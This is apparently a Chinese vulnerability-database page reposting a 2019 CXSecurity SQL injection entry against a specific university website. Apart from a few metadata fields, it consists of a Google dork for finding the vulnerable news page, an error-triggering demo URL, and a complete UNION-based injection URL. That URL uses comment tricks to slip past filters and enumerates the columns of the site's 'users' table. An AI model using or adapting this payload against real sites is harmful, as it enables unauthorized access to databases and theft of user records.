baqai.edu.pk sql injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1615724 漏洞类型
发布时间 2019-05-20 更新时间 2019-05-20
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050215
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#Exploit Title : baqai.edu.pk sql injection
#Google Dork : site:baqai.edu.pk inurl:/NewsDetail.php?id=
#Date : 17/5/2019
#Exploit Author : AmirAli Sadeghi Tamiz
#Tested on : Windows 10
#Demo : baqai.edu.pk/NewsDetail.php?id=47' ====> fatal error
EXPLOIT:
 https://baqai.edu.pk/NewsDetail.php?id=-47%27%20/*!50000uniOn*/%20/*!50000selEct*/%20%271%27,grOup_coNcat(column_name),%273%27,%274%27,%275%27,%276%27,%277%27+/*!50000froM*/+inforMation_schEma%20.%20columns+WhEre+Table_name=0x7573657273--+